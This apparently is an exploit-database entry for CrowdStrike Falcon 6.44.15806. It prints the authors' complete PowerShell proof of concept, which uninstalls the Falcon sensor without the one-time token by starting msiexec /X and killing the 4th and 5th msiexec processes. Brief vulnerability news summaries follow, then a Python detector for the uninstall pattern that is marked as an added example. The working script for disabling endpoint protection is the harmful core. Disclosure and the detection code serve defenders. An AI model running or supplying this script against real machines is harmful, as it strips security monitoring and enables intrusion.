Headline
CrowdStrike Falcon Agent 6.44.15806 Uninstall Issue
CrowdStrike Falcon Agent version 6.44.15806 has an uninstall bypass flaw that works without an installation token.
# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token
# Date: 30/11/2022
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
# Vendor Homepage: https://www.crowdstrike.com/
# Author Homepage: https://www.deda.cloud/
# Tested On: All Windows versions
# Version: 6.44.15806
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Publication of CVE-2022-44721 in progress.

# Locate the sensor's uninstall entry and take its product code (the GUID key name).
$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"
foreach ($obj in $InstalledSoftware) {
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName')) {
        $uninstall_uuid = $obj.Name.Split("\")[6]
    }
}

# PIDs of msiexec instances already observed during the uninstall.
$g_msiexec_instances = New-Object System.Collections.ArrayList
Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

while ($true) {
    # Keep polling until the sensor service is gone (no error output when it is).
    if (Get-Process -Name "CSFalconService" -ErrorAction SilentlyContinue) {
        Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
            if (-Not $g_msiexec_instances.Contains($_.Id)) {
                # ArrayList.Add returns the new index; discard it.
                $g_msiexec_instances.Add($_.Id) | Out-Null
                if (4 -eq $g_msiexec_instances.Count -or 5 -eq $g_msiexec_instances.Count) {
                    Start-Sleep -Milliseconds 100
                    Write-Host "[+] Killing PID $($g_msiexec_instances[-1])"
                    Stop-Process -Force -Id $g_msiexec_instances[-1]
                }
            }
        }
    } else {
        Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
        break
    }
}
Related news
CrowdStrike Falcon 6.44.15806 allows an administrative attacker to uninstall Falcon Sensor, bypassing the intended protection mechanism in which uninstallation requires possessing a one-time token. (The sensor is managed at the kernel level.)
The vulnerability might not be noteworthy, but the reporting process may be
A security firm has criticized CrowdStrike for operating a “ridiculous” bug bounty disclosure program following a sensor fla
A vulnerability was found in CrowdStrike Falcon 6.31.14505.0/6.42.15610. It has been classified as problematic. The affected component is the uninstallation handler, which can be circumvented to disable the security feature. The manipulation leads to missing authorization. The identifier of this vulnerability is VDB-206880.
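The script above leaves a distinctive trail on the endpoint: msiexec started with /X against the sensor's product code, launched from an interactive shell, followed by a burst of further msiexec instances. The following detector is an added example (not part of the advisory or the authors' code) that replays constructed Sysmon-style ProcessCreate records and raises an alert on that pattern; the product-code GUID, event tuple format, thresholds and parent-process list are assumptions, not values from the page.

```python
import re
from datetime import datetime, timedelta

# Placeholder product code (assumption): on a real host it is the GUID of the uninstall
# key whose DisplayName is "CrowdStrike Sensor Platform", as the script above reads it.
FALCON_PRODUCT_CODE = "{00000000-0000-0000-0000-000000000000}"
UNINSTALL_RE = re.compile(r"/x\s*\{[0-9a-f-]+\}", re.IGNORECASE)
INTERACTIVE_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "explorer.exe"}
BURST_WINDOW = timedelta(seconds=120)
BURST_THRESHOLD = 4  # the script above acts on the 4th and 5th msiexec instance

# Constructed Sysmon-style ProcessCreate records: (UtcTime, Image, ParentImage, CommandLine).
SAMPLE_EVENTS = [
    ("2022-11-30 10:00:00", "msiexec.exe", "powershell.exe", f"msiexec /X{FALCON_PRODUCT_CODE}"),
    ("2022-11-30 10:00:01", "msiexec.exe", "services.exe", r"C:\Windows\system32\msiexec.exe /V"),
    ("2022-11-30 10:00:02", "msiexec.exe", "msiexec.exe", r"C:\Windows\syswow64\MsiExec.exe -Embedding 1"),
    ("2022-11-30 10:00:03", "msiexec.exe", "msiexec.exe", r"C:\Windows\system32\MsiExec.exe -Embedding 2"),
    ("2022-11-30 10:00:04", "msiexec.exe", "msiexec.exe", r"C:\Windows\system32\MsiExec.exe -Embedding 3"),
    ("2022-11-30 10:30:00", "msiexec.exe", "ccmexec.exe", "msiexec /i vendor.msi /qn"),  # benign install
]


def detect(events):
    """Flag msiexec /X runs against the Falcon product code and msiexec bursts that follow them."""
    alerts = []
    pending = []      # start times of uninstall attempts not yet matched to a burst
    msi_starts = []   # start times of every msiexec.exe seen
    for ts, image, parent, cmdline in events:
        if image.lower() != "msiexec.exe":
            continue
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        msi_starts.append(t)
        if UNINSTALL_RE.search(cmdline) and FALCON_PRODUCT_CODE.lower() in cmdline.lower():
            # Deployment tools normally drive sensor removal; an interactive shell parent is suspicious.
            severity = "high" if parent.lower() in INTERACTIVE_PARENTS else "medium"
            alerts.append({"rule": "falcon_uninstall_attempt", "time": ts,
                           "parent": parent, "severity": severity})
            pending.append(t)
        for start in list(pending):
            if t - start > BURST_WINDOW:
                pending.remove(start)
                continue
            count = sum(1 for x in msi_starts if start <= x <= t)
            if count >= BURST_THRESHOLD:
                alerts.append({"rule": "msiexec_burst_after_uninstall", "time": ts,
                               "count": count, "severity": "high"})
                pending.remove(start)
    return alerts
```

On the sample data the first record yields a high-severity uninstall alert and the fourth msiexec start within the window yields the burst alert; the later SCCM-style install produces nothing.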